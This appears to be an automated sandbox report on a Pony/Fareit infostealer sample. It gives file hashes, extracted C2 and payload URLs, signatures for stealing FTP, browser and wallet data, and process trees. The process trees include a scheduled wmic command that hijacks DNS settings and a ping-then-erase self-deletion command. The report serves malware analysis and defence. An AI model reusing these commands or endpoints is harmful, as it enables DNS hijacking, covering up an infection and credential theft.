Analysis

  • max time kernel
    103s
  • max time network
    77s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    20/11/2022, 08:34

General

  • Target

    66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe

  • Size

    81KB

  • MD5

    1535bd3f07b9163e3f8c1105318e4fa0

  • SHA1

    bd6a3c48c57af869ab047d677b2e12623da2b2cf

  • SHA256

    66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c

  • SHA512

    d7388ec2678bc18ba54b580611898d7d7f433c7396d6bd81f51aeabfc53e530b1826593554204def38f1242c301badc5d064d9e61451d1b52fffe48572b7c5d5

  • SSDEEP

    1536:BpAe/akMDYbcHmCPEY1Bh6OGYtl2ajXLB0M/3kIhG496yUBx7Vx1Q:BpAe/akMlmXYfgXYtxDmk3dhp2x7zy

Malware Config

Extracted

Family

pony

C2

http://voladex.pw:36/fix/mark.php

http://bolakes.pw:36/fix/refer.php

http://camtest33.pw:36/fix/symbols.php

Attributes
  • payload_url

    http://camtest3.pw:36/fix/Sonar.exe

Signatures

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Deletes itself 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 32 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
    "C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1724
    • C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
      "C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe"
      2⤵
      • Drops file in Windows directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1476
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c at 09:38:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.203", "8.8.8.8")
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:328
        • C:\Windows\SysWOW64\at.exe
          at 09:38:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.203", "8.8.8.8")
          4⤵
            PID:1812
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c ping -n 10 localhost && erase "C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe"
          3⤵
          • Deletes itself
          • Suspicious use of WriteProcessMemory
          PID:364
          • C:\Windows\SysWOW64\PING.EXE
            ping -n 10 localhost
            4⤵
            • Runs ping.exe
            PID:924

    Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • memory/1476-54-0x0000000000400000-0x0000000000418000-memory.dmp

            Filesize

            96KB

          • memory/1476-55-0x0000000000400000-0x0000000000418000-memory.dmp

            Filesize

            96KB

          • memory/1476-56-0x0000000000400000-0x0000000000418000-memory.dmp

            Filesize

            96KB

          • memory/1476-60-0x0000000076161000-0x0000000076163000-memory.dmp

            Filesize

            8KB

          • memory/1476-61-0x0000000000400000-0x0000000000418000-memory.dmp

            Filesize

            96KB

          • memory/1476-62-0x0000000000400000-0x0000000000418000-memory.dmp

            Filesize

            96KB

          • memory/1476-67-0x0000000000400000-0x0000000000418000-memory.dmp

            Filesize

            96KB

          • memory/1724-58-0x0000000000400000-0x0000000000417000-memory.dmp

            Filesize

            92KB